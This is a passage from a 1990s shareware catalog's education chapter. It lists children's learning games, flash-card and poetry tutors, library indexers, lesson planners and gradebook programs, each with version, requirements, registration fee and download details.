Go Fish. See full + description on page 462. + + Product: Roxie's Math Fish + Learn math while playing "Go Fish" See full description on + page 462. + + Product: Roxie's Math Fish + Learn math while playing "Go Fish" See full description on + page 463. + + Product: Roxie's Reading Fish + Learn to read while playing "Go Fish" See full description on + page 463. + + Product: Roxie's Reading Fish + Learn to read while playing "Go Fish" See full description on + page 464. + + Product: Teach Your Children + Author: Q&D Software Development (Dave Verschleiser), + 201-635-1824 + Version: 2.0 (02-06-95) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; VGA monitor; + VBRUN300.DLL. + Registration fee: $19.95 (add $3.95 for shipping to U.S. + addresses) (add $4.95 for shipping to Canadian addresses) (add + $4.95 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); 51/4" master disk(s); lifetime unlimited phone, + CompuServe, mail support; bonus utilities; bonus data; all ASP- + + Chapter 13, "Education" 436 + + + + wide offers (see page 6). Lifetime free upgrading allowed. 99 + free update disk(s) sent out. + Look for: TYC2_0.ZIP on BBSs; TYC.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 0 (or contact userID 76336,3271 for + assistance). + SWREG#: 3164 + PsL#: 11793 + Download size: 800k (about 60 minutes with a 2400 baud modem) + Description: + Makes learning math and reading fun for you and your child with + visual and audio reinforcement. Sound card not required! + Assists with addition, subtraction, and multiplication, as well + as spelling and word recognition. Various levels for varying + abilities. Lets you record your child's progress unobtrusively + and view results via printed and/or on-screen reports. Handy + on-screen pointers guide you and your child every step of the + way. Includes on-line context sensitive help system. + + + Product: U.S. Geography Tutor + Geography testing/teaching Windows program. See full + description on page 468. + + Product: WinFlash + Author: Open Windows (Richard W. Bryant), 719-531-0403 + Version: 3.0 (12-21-93) + Needs: IBM AT (80286), Windows 3.1 or better. 512k RAM; VGA + monitor; Hard disk. Any ASCII text editor. + Strongly recommended: Mouse. + Registration fee: $19.95 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $3.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 6 + months of CompuServe, mail support; lifetime return policy; + bonus utilities; disks of other shareware. 12-month free + upgrading allowed. + Look for: FLASH_30.ZIP on BBSs (call 703-680-9269 to download it + at no charge); FLASH.ZIP on CompuServe in CIS:WINUTIL forum + LIBrary 18 (or contact userID 75236,3243 for assistance). + Download size: 162k (about twelve minutes with a 2400 baud modem) + Awards & nominations: 1994 finalist, PC Magazine/Ziff-Davis + Interactive Shareware Awards. 1994 finalist, Shareware + Industry Awards. + Description: + Adds TrueType fonts, colors, .BMP graphics, .WAV sounds and a + new "Priority Questions From History" mode which customizes the + selection of questions to focus on those not yet learned. Easy + for children to use - no computer experience needed. Memorize + coursework or professional material fast! + + Chapter 13, "Education" 437 + + + + Product: Wonder Word + Author: Software Avenue, Inc. (Gregory Lee), 602-813-0876 + Version: 1.2 (08-05-95) + Needs: IBM PC, DOS 3.3 or better. 640k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; VGA monitor. + Strongly recommended: Hard disk; XMS memory; sound card. + Registration fee: $24.95 (add $4.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited CompuServe, mail + support; 3-month return policy; bonus data; bonus graphics; all + ASP-wide offers (see page 6); disks of other shareware. 3-month + free upgrading allowed. + Look for: WONDER.ZIP on BBSs; WONDER.ZIP on CompuServe in + CIS:EDUCATION forum LIBrary 0 (or contact userID 76455,3236 for + assistance); WONDER.ZIP on GEnie in 0 forum LIBrary 0. + Download size: 537k (about 40 minutes with a 2400 baud modem) + Description: + The animated spelling game with Zipper the monkey. Colorful + graphics, digitized sound effects, and a full MIDI soundtrack + make learning to spell fun! Comes with the first word set + 'Things at Home'. Two additional word sets, 'The World Around + Us' and 'Critters' are available with the registered version. A + SoundBlaster compatible sound card is recommended but not + required to enjoy this great program. Your kids will love it! + + + Product: Z & Z Color + Windows Color-by-Number for ages 3+. See full description on + page 425. + + Product: Z & Z Puzzle + Combination jigsaw/slider puzzle for ages 3+. See full + description on page 425. + + Product: Zpeller + Improves spelling & vocabulary skills. See full description on + page 476. + + + 13.3 Junior high + + Product: Card Flash + Card flash. See full description on page 440. + + Product: Discover Juggling 1 - Balls + Learn to juggle 3, 4, and 5 balls. See full description on + page 544. + + Product: Ecomaster + Ecology strategy game. See full description on page 474. + + Chapter 13, "Education" 438 + + + + Product: Know It All + The incredible, EXPANDABLE learning game. See full description + on page 432. + + Product: Mouse Math + A whimsical verbal math drill program. See full description on + page 459. + + Product: OLYMPIAD + Contest scoring by knowledge and judgment. See full + description on page 450. + + Product: PoeTrio + Author: Chatfield Software, Inc. (Hale Chatfield), 216-632-5447 + Version: 1.0 (04-07-91) + Needs: IBM PC, DOS 2.11 or better. 240k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $20.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited tollfree 800# phone, fax, CompuServe, GEnie, + newsletter, mail support; 1-month return policy; all ASP-wide + offers (see page 6); discounts on other products; discounts on + upgrades. 10% discount on other Chatfield Software products; + free bonus disk. + Look for: CSPT.ZIP on BBSs; CSPT.ZIP on CompuServe in CIS:IBMAPPS + forum LIBrary 0 (or contact userID 71031,1036 for assistance); + CSPT.ZIP on GEnie in IBMPC forum LIBrary 0. + Download size: 131k (about ten minutes with a 2400 baud modem) + Description: + Derives its name from the fact that it is a trio of educational + poetry programs: one for free verse (CATALYST); one for + syllabics (HAIKUKU); and one for an original verseform called + the CANTONA. Each of the three programs has its own verse + editor. + + + Product: Teach Your Children + Helps kids have fun learning math and reading. See full + description on page 435. + + Product: TRAINER + Score knowledge and judgment. See full description on + page 450. + + Product: TRUE MULTIPLE-CHOICE + Test-Generator and Study-Skills. See full description on + page 451. + + Product: TRUE MULTIPLE-CHOICE DOS + Write, game, and test knowledge and judgment. See full + description on page 451. + + Chapter 13, "Education" 439 + + + + Product: U.S. Geography Tutor + Geography testing/teaching Windows program. See full + description on page 468. + + Product: XYSee + Mid/Hi-school visual math for Windows & DOS. See full + description on page 381. + + Product: Zpeller + Improves spelling & vocabulary skills. See full description on + page 476. + + + 13.4 High school + + Product: Bible Timeline for Windows + Interactive historical timelines. See full description on + page 583. + + Product: Card Flash + Author: Burnham Park Software, Inc., 312-922-6313 + Version: 1.0 (11-21-94) + Needs: IBM 80386, Windows 3.1 or better. 1024k RAM; EGA monitor; + Hard disk. + Strongly recommended: VGA monitor; sound card. + Registration fee: $12.00 (add $1.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: lifetime unlimited phone, BBS, CompuServe, + mail support; bonus data; all ASP-wide offers (see page 6); + discounts on other products; discounts on upgrades. Lifetime + free upgrading allowed. + Look for: CFLASH10.ZIP on BBSs (call 312-922-2839 to download it + at no charge); CFLAS*.ZIP on CompuServe in CIS:WINFUN forum + LIBrary 15 (or contact userID 71532,3271 for assistance). + Download size: 152k (about twelve minutes with a 2400 baud modem) + Description: + A Windows flash card program that aids with learning and + memorization. Multimedia flash cards may be created and + virtually any topic may be used. On-line help. + + + Product: FDplot + Function and data plot w/error-bars. See full description on + page 382. + + Product: Fictionary + The game of fantastic/farfetched definitions. See full + description on page 626. + + Product: Know It All + The incredible, EXPANDABLE learning game. See full description + on page 432. + + Chapter 13, "Education" 440 + + + + Product: NuMorse Morse Code trainer + Suitable for all levels, beginner to advanced. See full + description on page 537. + + Product: OLYMPIAD + Contest scoring by knowledge and judgment. See full + description on page 450. + + Product: PC-ECAP + Linear circuit analysis program with graphics. See full + description on page 344. + + Product: Periodic Table + Electronic table of elements with decay data. See full + description on page 475. + + Product: PoeTrio + Three poetry tutorials with separate editors. See full + description on page 438. + + Product: POETRY STAR + Author: Chatfield Software, Inc. (Hale Chatfield), 216-632-5447 + Version: 1.1 (03-15-92) + Needs: IBM PC, DOS 2.11 or better. 240k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Dual 720k floppy drives. + Registration fee: $25.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited tollfree 800# phone, fax, + CompuServe, GEnie, newsletter, mail support; 1-month return + policy; all ASP-wide offers (see page 6); discounts on other + products; discounts on upgrades. Free writers' tip-sheets; 10% + discount on other Chatfield Software products; FREE bonus disk. + Look for: CSPS.ZIP on BBSs; CSPS.ZIP on CompuServe in CIS:IBMAPPS + forum LIBrary 1 (or contact userID 71031,1036 for assistance); + CSPS.ZIP on GEnie in IBMPC forum LIBrary 0. + Download size: 124k (about nine minutes with a 2400 baud modem) + Description: + A highly interactive tutor for contemporary poetry writing + which approaches the subject of poetry writing from the + perspective of discovery and delight, the way poets approach + it. Leads you step by step into a wacky, joyful new world where + verbal imagination reigns supreme. It is written in the + Artficial Intelligence language INRAC, which makes it possible + for you to communicate with the program in standard English. + + + Product: QA Study Aid + Comprehensive computer testing/grading system. See full + description on page 312. + + Chapter 13, "Education" 441 + + + + Product: Spanish Helper Level One + Interactive program to learn Spanish. See full description on + page 467. + + Product: TRAINER + Score knowledge and judgment. See full description on + page 450. + + Product: TRUE MULTIPLE-CHOICE + Test-Generator and Study-Skills. See full description on + page 451. + + Product: TRUE MULTIPLE-CHOICE DOS + Write, game, and test knowledge and judgment. See full + description on page 451. + + Product: Verbal Vanquish + Author: James Bair Software + Version: 2.03 (09-23-95) + Needs: IBM PC, DOS 2.1 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: EGA monitor; Dual 720k floppy drives; + Hard disk. + Registration fee: $35.00 + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 12 months of + unlimited CompuServe, mail support; 12-month return policy; + bonus data; all ASP-wide offers (see page 6); discounts on + other products; discounts on upgrades. 12-month free upgrading + allowed. 1 free update disk(s) sent out. Full SAT + Registration includes similar Math Program. + Look for: availability unknown on BBSs; VV-SAT.ZIP on CompuServe + in CIS:EDFORUM forum LIBrary 3 (or contact userID 70730,3001 + for assistance). + SWREG#: 4976 + Download size: 290k (about 22 minutes with a 2400 baud modem) + Description: + Vanquish your Anguish on the SAT, ACT, etc. Students using + author's techniques have increased their SAT verbal scores an + average of 70 points. Emphasizes three things which most SAT + prep programs & books lack: + Strategy. Raise scores by strategies, NOT boring drill. + Real SAT/SAT/GRE style questions. Nothing bogus. + Real exam vocabulary. Carefully selected word list. + Updated for SAT-I & ACT. Award winner. Also for GRE, LSAT, GED, + Nat. Teacher, etc. + + + Product: WinFlash + Windows flash card program. See full description on page 436. + + Chapter 13, "Education" 442 + + + + Product: XYSee + Mid/Hi-school visual math for Windows & DOS. See full + description on page 381. + + Product: Zpeller + Improves spelling & vocabulary skills. See full description on + page 476. + + + 13.5 College + + Product: BUDDY: A Tutorial Companion + Eight-lesson AI tutorial for clearer writing. See full + description on page 200. + + Product: Card Flash + Card flash. See full description on page 439. + + Product: CHRONOS + Interactive historical timelines. See full description on + page 469. + + Product: FDplot + Function and data plot w/error-bars. See full description on + page 382. + + Product: Fictionary + The game of fantastic/farfetched definitions. See full + description on page 626. + + Product: LEADING AND MANAGING OTHERS + A multimedia seminar on disk: leaders & mgrs. See full + description on page 312. + + Product: Lecture + Displays text-based slide show lectures. See full description + on page 313. + + Product: OLYMPIAD + Contest scoring by knowledge and judgment. See full + description on page 450. + + Product: PC-ECAP + Linear circuit analysis program with graphics. See full + description on page 344. + + Product: Periodic Table + Electronic table of elements with decay data. See full + description on page 475. + + Product: PowerBatch + Batch file replacement creates compiled pgms. See full + description on page 100. + + Chapter 13, "Education" 443 + + + + Product: QA Study Aid + Comprehensive computer testing/grading system. See full + description on page 312. + + Product: Spanish Helper Level One + Interactive program to learn Spanish. See full description on + page 467. + + Product: TRAINER + Score knowledge and judgment. See full description on + page 450. + + Product: TRUE MULTIPLE-CHOICE + Test-Generator and Study-Skills. See full description on + page 451. + + Product: TRUE MULTIPLE-CHOICE DOS + Write, game, and test knowledge and judgment. See full + description on page 451. + + Product: Verbal Vanquish + SAT prep program that really works. See full description on + page 441. + + Product: WinFlash + Windows flash card program. See full description on page 436. + + Product: XYSee + Mid/Hi-school visual math for Windows & DOS. See full + description on page 381. + + Product: Zpeller + Improves spelling & vocabulary skills. See full description on + page 476. + + + 13.6 Library/bibliography + + See also: Business, Specific-field systems, Library. + + Product: BIBLOGIC + Bibliographic reference database manager. See full description + on page 194. + + Chapter 13, "Education" 444 + + + + Product: Book Librarian + Author: TurboSystemsCo (Lemuel D. Turner), 404-516-8575 + Version: 1.53 (12-26-93) + Needs: IBM PC, DOS 2.11 or better. 512k RAM. + Strongly recommended: CGA monitor; Hard disk. + Registration fee: $34.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of phone, fax, CompuServe, GEnie, + mail support; discounts on other products. + Look for: BL153.ZIP on BBSs (call 703-680-9269 to download it at + no charge); BL.ZIP on CompuServe in CIS:PCAPP forum LIBrary 7 + (or contact userID 72427,1603 for assistance); BL153.ZIP on + GEnie in IBMPC forum LIBrary 15 (or contact userID L.TURNER1 + for assistance). + Download size: 223k (about 17 minutes with a 2400 baud modem) + Description: + Powerful easy-to-use menu-driven program to organize and manage + a personal, club, corporate, church or school library. Features + context sensitive help, browse and find windows. Each record + stores title, author, subject, book type, catalog # and much + more. Full featured reporting with numerous reports to the + screen, printer or disk. + + + Product: EZ-Index - Popular Photography + Index for Popular Photography Magazine. See full description + on page 557. + + Chapter 13, "Education" 445 + + + + Product: EZ-Index - Canadian Geographic + Author: E-Z Access Software Ltd. (Leo Taylor), 506-529-3432 + Version: 1.90 (10-10-95) + Needs: IBM PC, DOS 3.1 or better. 300k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Strongly recommended: EGA monitor; Hard disk; HP DeskJet + printer; HP LaserJet printer; Epson printer; EMS memory; XMS + memory. + Registration fee: $9.00 (Canadian dollars) (add $4.00 (Canadian + dollars) for shipping to U.S. addresses) (add $4.00 (Canadian + dollars) for shipping to Canadian addresses) (add $6.00 + (Canadian dollars) for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, BBS, CompuServe, mail support; + 3-month return policy; discounts on other products; discounts + on upgrades. + Look for: CGINDX10.ZIP on BBSs (call 506-529-4067 to download it + at no charge); CGINDX10.ZIP on CompuServe in CIS:CDNFORUM forum + LIBrary 1 (or contact userID 74002,1261 for assistance). + SWREG#: 8575 + Download size: 250k (about 19 minutes with a 2400 baud modem) + Description: + Reference index of the articles published in the magazine. + Available in 2 versions covering 1985 to the present. v1.90 + includes Jan/1990 to the present. Articles categorized by + subject matter: archaeology, Alberta, etc. Features: word + search, print, color, install. Windows 3.1/95 setup instruction + provided. Updates available. For subscribers it helps create a + unique source of information. + + + Product: EZ-Index - National Geographic + Reference Index for National Geographic Mag. See full + description on page 517. + + Product: EZ-Index for Traveler + Reference index for NGS TRAVELER Magazine. See full + description on page 518. + + Product: Grow'Em + Grow from seed/cuttings. Easy, slick, great p. See full + description on page 534. + + Chapter 13, "Education" 446 + + + + Product: REFILE + Author: MegAS Corporation, 317-844-6380 + Version: 3.1 (04-17-94) + Needs: IBM PC, DOS 2.0 or better. 640k RAM; CGA monitor; Dual + 720k floppy drives; Hard disk; HP LaserJet printer; Mouse; + Epson printer. + Strongly recommended: VGA monitor. + Registration fee: $25.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of phone, CompuServe, mail support; + 1-month limited return policy; discounts on upgrades. + Look for: availability unknown on BBSs; REFILE.ZIP on CompuServe + in CIS:PCAPP forum LIBrary 7 (or contact userID 73770,3076 for + assistance). + SWREG#: 1768 + Download size: 172k (about 13 minutes with a 2400 baud modem) + Description: + One component of a document management system for the filing + and retrieval of journal or periodical articles. A browse + feature for authors, sources, keywords, and document folders + simplifies data entry and searches. It assigns and manages all + document identification and will print index cards or labels. + Formatted bibliographies may be produced with a companion + product. + + + Product: ScrollZ + For your periodicals, books, papers & comics. See full + description on page 520. + + + 13.7 Teachers + + Product: Crossword Clipper for DOS + Crossword puzzle layout/publishing tool. See full description + on page 187. + + Product: Crossword Clipper for Windows + Crossword puzzle layout/publishing tool. See full description + on page 188. + + Product: Crossword Construction Kit + Windows crossword puzzle creator. See full description on + page 628. + + Chapter 13, "Education" 447 + + + + Product: Crossword Creator + Author: PC HELP-LINE, 909-797-3091 + Version: 6.00 (04-15-94) + Needs: IBM PC, DOS 5.0 or better. 384k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Mouse. + Registration fee: $49.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, CompuServe, mail + support; 1-month return policy; bonus utilities; discounts on + other products. 3-month free upgrading allowed. Word lists; + Crossword Clipper publishing utility. + Look for: CWC600.ZIP on BBSs; CWC.ZIP on CompuServe in CIS:PCNEW + forum LIBrary 8 (or contact userID 72357,3523 for assistance). + SWREG#: 95 + Download size: 220k (about 17 minutes with a 2400 baud modem) + Description: + A great tool for teachers and trainers, great fun for students + and trainees. This crossword puzzle "editor" provides all the + tools you need to quickly design and print your own crosswords. + Pull-down menus, mouse support, comprehensive on-line help. Can + generate freeform puzzles from a word list or ASCII file. + Works with a companion program, Crossword Clipper, to produce + .PCX and .BMP graphic files for use in word-processors or + graphics applications. Spanish, French, and German versions + available. + + + Product: LessonPlanZ + Author: Unicorn Software Limited (Charles P. Schell IV), + 816-429-3558 + Version: 2.60 (09-01-94) + Needs: IBM PC, DOS 2.1 or better. 330k RAM; CGA monitor; + Hercules monitor; Dual 720k floppy drives. IBM Graphics + printer. + Strongly recommended: Hard disk; HP LaserJet printer; Mouse. + Registration fee: $31.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; 31/2" + master disk(s); 51/4" master disk(s); lifetime unlimited phone, + fax, BBS, CompuServe, mail support; all ASP-wide offers (see + page 6); disks of other shareware; discounts on other products. + + Chapter 13, "Education" 448 + + + + Lifetime free upgrading allowed. 99 free update disk(s) sent + out. + Look for: LPLNZ260.ZIP on BBSs (call 317-784-2147 to download it + at no charge); LPLANZ.ZIP on CompuServe in CIS:EDFORUM forum + LIBrary 2 (or contact userID 70272,3317 for assistance). + SWREG#: 69 + Download size: 253k (about 19 minutes with a 2400 baud modem) + Description: + Lesson planning made easy! Has separate areas for goals, + objectives, methods, evaluations, and materials. Each area can + be from 1 to 5000 lines long! Header information holds title, + dates covered, number of days, subject and more. Default + settings for school and teacher name. Prints a variety of + reports including a basic lesson plan, separate areas, a custom + listing, and folder labels to hold your plans! Uses common WP + commands, menu driven, mousable, and on line help. + + + Product: LessonPlanZ For Windows + Author: Unicorn Software Limited (Charles P. Schell IV), + 816-429-3558 + Version: 2.00 (01-09-96) + Needs: IBM 80386, Windows 3.0 or better. 330k RAM; CGA monitor; + Hercules monitor; Dual 720k floppy drives. + Strongly recommended: Hard disk; HP LaserJet printer; Mouse. + Registration fee: $29.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; 31/2" + master disk(s); 51/4" master disk(s); lifetime unlimited phone, + fax, BBS, CompuServe, mail support; all ASP-wide offers (see + page 6); disks of other shareware; discounts on other products. + Lifetime free upgrading allowed. 99 free update disk(s) sent + out. + Look for: LSNPW200.ZIP on BBSs (call 317-784-2147 to download it + at no charge); LSNPLW.ZIP on CompuServe in CIS:UNICORN forum + LIBrary 18 (or contact userID 70272,3317 for assistance). + SWREG#: 9614 + Download size: 1000k (about 74 minutes with a 2400 baud modem) + Description: + Lesson planning made easy! Has separate areas for goals, + objectives, methods, evaluations, and materials. Each area can + be from 1 to 3500 lines long! Header information holds title, + dates covered, number of days, subject and more. Default + settings for school and teacher name. Prints a variety of + reports including a basic lesson plan, separate areas, a custom + listing, and folder labels to hold your plans! Uses common WP + commands, menu driven, mousable, and on line help. + + + Product: A MUSICAL TUTORIAL + An excellent way to promote musical study. See full + description on page 473. + + Chapter 13, "Education" 449 + + + + Product: A MUSICAL TUTORIAL for Windows + An excellent way to promote musical study. See full + description on page 473. + + Product: OLYMPIAD + Author: Nine-Patch Software (Richard A. Hart, PhD), 816-582-7780 + Version: 1.6 (12-15-95) + Needs: IBM PC, DOS 3.0 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Strongly recommended: Hard disk; HP DeskJet printer; Epson + printer. + Registration fee: $29.95 + Registration benefits: choice of 31/2" or 51/4" master disk(s); 12 + months of phone, fax, CompuServe, mail support; discounts on + other products; discounts on upgrades. 3-month free upgrading + allowed. 1 free update disk(s) sent out. + Look for: OLYMPI16.ZIP on BBSs; OLYMPIAD.ZIP on CompuServe in + CIS:EDFORUM forum LIBrary 3 (or contact userID 71222,3565 for + assistance). + PsL#: 14373 + Download size: 131k (about ten minutes with a 2400 baud modem) + Description: + Contest scoring ranks contestants and teams by knowledge and + judgement. Maximum of 500 contestants, 100 questions, and 100 + schools or groups. Ranks individuals, teams of three, and + school or group winners. Instructions and sample data are built + in. The top three scoring students from a school or group are + selected as the school or group team. Students select questions + to report what in their own judgment they know or can reason. + Use any machine scoreable questions. + + + Product: QA Study Aid + Comprehensive computer testing/grading system. See full + description on page 312. + + Product: TRAINER + Author: Nine-Patch Software (Richard A. Hart, PhD), 816-582-7780 + Version: 1.9 (12-16-95) + Needs: IBM PC, DOS 3.0 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Strongly recommended: Hard disk; HP DeskJet printer; Epson + printer. + Registration fee: $29.95 + Registration benefits: choice of 31/2" or 51/4" master disk(s); 12 + months of phone, fax, CompuServe, mail support; bonus + utilities; discounts on other products; discounts on upgrades. + + Chapter 13, "Education" 450 + + + + 3-month free upgrading allowed. 1 free update disk(s) sent + out. + Look for: TRAINE19.ZIP on BBSs; TRAINER.ZIP on CompuServe in + CIS:EDFORUM forum LIBrary 3 (or contact userID 71222,3565 for + assistance). + Download size: 157k (about twelve minutes with a 2400 baud modem) + Description: + Score knowledge and judgment rather than rank students. + Instructions for hand and computer scoring of essay and + multiple-choice. Sample data built in. Allow students to report + what they know or can do. Converts scores to grades. Exports to + gradebook or spreadsheet. + + Produces individual score slips, ranked scores, histogram, + class plot (quantity by quality), item analysis (long and + short). Checks for independent marking. Flags problem questions + by difficulty and levels of thinking. + + + Product: TRUE MULTIPLE-CHOICE + Author: Nine-Patch Software (Richard A. Hart, PhD), 816-582-7780 + Version: 2.4 (01-05-96) + Needs: IBM AT (80286), Windows 3.1 or better. SVGA monitor; Hard + disk; HP DeskJet printer; Mouse; Epson printer; VBRUN300.DLL. + Registration fee: $29.95 + Registration benefits: choice of 31/2" or 51/4" master disk(s); 12 + months of phone, fax, CompuServe, mail support; bonus + utilities; discounts on other products; discounts on upgrades. + 3-month free upgrading allowed. 1 free update disk(s) sent + out. (Key registration only [no disks]: $14.95). + Look for: TRUEMC24.ZIP on BBSs; TRUEMC.ZIP on CompuServe in + CIS:EDFORUM forum LIBrary 3 (or contact userID 71222,3565 for + assistance). + Download size: 230k (about 17 minutes with a 2400 baud modem) + Description: + Score knowledge and judgment. Write, review, game and test at + five levels of thinking. Individual interactive tests and + printed class tests. Limits: 200 questions per file and 50 + questions per test. Convert student authored review files into + instructional files for remediation and class tests. + Instructions and sample data are built in. + + Stresses learning at all levels of thinking. The question + editor prompts for a seven part paragraph that is recombined + into over two dozen different questions. + + Chapter 13, "Education" 451 + + + + Product: TRUE MULTIPLE-CHOICE DOS + Author: Nine-Patch Software (Richard A. Hart, PhD), 816-582-7780 + Version: 2.3 (12-20-95) + Needs: IBM PC, DOS 3.0 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; HP DeskJet printer; Epson printer. + Strongly recommended: Hard disk; Mouse. + Registration fee: $29.95 + Registration benefits: choice of 31/2" or 51/4" master disk(s); 12 + months of phone, fax, CompuServe, mail support; bonus + utilities; discounts on other products; discounts on upgrades. + 3-month free upgrading allowed. 1 free update disk(s) sent + out. + Look for: TRUEMD23.ZIP on BBSs; TRUEMD.ZIP on CompuServe in + CIS:EDFORUM forum LIBrary 3 (or contact userID 71222,3565 for + assistance). + Download size: 360k (about 27 minutes with a 2400 baud modem) + Description: + Write, review, game and test knowledge and judgment at five + levels of thinking. Individual interactive tests and printed + class tests. Limits: 200 questions per file and 50 questions + per test. Convert student authored review files into + instructional files for remediation and class tests. + Instructions and sample data are built in. + + Tutor mode stresses learning at all levels of thinking. The + question editor prompts for a seven part paragraph that is + recombined into over two dozen different questions. + + + Product: Word Search Construction Kit + Windows word search puzzle creator. See full description on + page 630. + + Product: Word Search Rampage + Multi-media ready words search game. See full description on + page 633. + + Product: Word Wrestle + Boggle(tm) style word game. See full description on page 627. + + Chapter 13, "Education" 452 + + + + 13.7.1 Gradebooks + + Product: GradeBook for Windows + Author: R&R EdWare (Russell Stevens), 517-727-2066 + Version: 3.07 (04-07-95) + Needs: IBM 80386, Windows 3.1 or better. 2048k RAM; CGA monitor; + Hard disk. + Strongly recommended: VGA monitor; HP DeskJet printer; HP + LaserJet printer; Postscript printer; Mouse; Epson printer. + Registration fee: $34.00 (add $3.00 for shipping to Canadian + addresses) (add $15.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); lifetime unlimited + phone, fax, CompuServe, mail support; bonus utilities; bonus + templates; discounts on other products; discounts on upgrades. + Look for: GB307.ZIP on BBSs; GB307.ZIP on CompuServe in + CIS:EDFORUM forum LIBrary 2 (or contact userID 70150,323 for + assistance). + SWREG#: 685 + PsL#: 10763 + Download size: 830k (about 62 minutes with a 2400 baud modem) + Awards & nominations: 1994 finalist, PC Magazine/Ziff-Davis + Interactive Shareware Awards. + Description: + A Windows based teacher's gradebook with extensive online help. + Terms, tasks & grades may be customized. Allows multiple + periods per term, score transfers, curving, teacher notes, not + counted scores, user defined categories, ID#'s, tot points or + category weights, discard worst "n" scores per category, extra + credit options, multiple class score & grade distribution + statistics with charts, progress reports, imp/exp, clipbd & + font support, interim weights, attendance, Word & Excel macros, + much more. + + + Product: R&R School Master for Windows + Author: R&R EdWare (Russell Stevens), 517-727-2066 + Version: 1.04 (02-11-96) + Needs: IBM 80386, Windows 3.1 or better. 8192k RAM; VGA monitor; + Hard disk; Mouse; VBRUN300.DLL. + Strongly recommended: SVGA monitor; HP DeskJet printer; HP + LaserJet printer; Postscript printer; Epson printer. + Registration fee: $39.00 (add $4.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $15.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime unlimited phone, fax, + CompuServe, mail support; lifetime return policy; bonus + + Chapter 13, "Education" 453 + + + + utilities; bonus templates; discounts on other products; + discounts on upgrades. + Look for: SM104.ZIP on BBSs; SM104.ZIP on CompuServe in + CIS:EDFORUM forum LIBrary 1 (or contact userID 70150,323 for + assistance). + SWREG#: 9956 + Download size: 1200k (about 89 minutes with a 2400 baud modem) + Description: + A full featured gradebook suitable for individual instructors + or entire school systems. Also does report cards, seating + charts, tracks attendance, conduct and citizenship, creates + reusable lesson plans, tracks appointments and contacts and + allows you to create and save your own database queries and + form letters. Define your own database fields. Extensive report + customization options. + + + Product: VAR Grade + Author: VARed Software (Dennis Revie), 805-523-7546 + Version: 6.04B (11-15-95) + Needs: IBM PC, DOS 3.3 or better. 640k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; Dual 720k floppy drives. + Strongly recommended: CGA monitor; Hard disk; Mouse; EMS + memory; XMS memory; math coprocessor. + Registration fee: $40.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); lifetime unlimited + phone, BBS, CompuServe, mail support; bonus data; bonus fonts; + bonus templates; all ASP-wide offers (see page 6); discounts on + other products; discounts on upgrades. 2-month free upgrading + allowed. + Look for: VARG604.ZIP on BBSs; VARG604.ZIP on CompuServe in + CIS:EDFORUM forum LIBrary 0 (or contact userID 73427,112 for + assistance). + PsL#: 10319 + Download size: 670k (about 50 minutes with a 2400 baud modem) + Description: + Extremely flexible grading and attendance program. Plots, + statistics, seating charts, numerous printouts, database items, + sections, unlimited students and tasks. You can weight, + average, discard, sum, and require tasks (assignments). It has + complete analysis tools, including statistics, plots, and ways + to modify grades. Mouse enabled. + + Chapter 13, "Education" 454 + + + + Product: VAR Grade for Windows + Author: VARed Software (Dennis Revie), 805-523-7546 + Version: 1.02A (11-15-95) + Needs: IBM AT (80286), Windows 3.1 or better. 4000k RAM; EGA + monitor; Hard disk; Mouse. + Strongly recommended: math coprocessor. + Registration fee: $50.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime unlimited phone, BBS, + CompuServe, mail support; bonus data; bonus fonts; bonus + templates; all ASP-wide offers (see page 6); discounts on other + products; 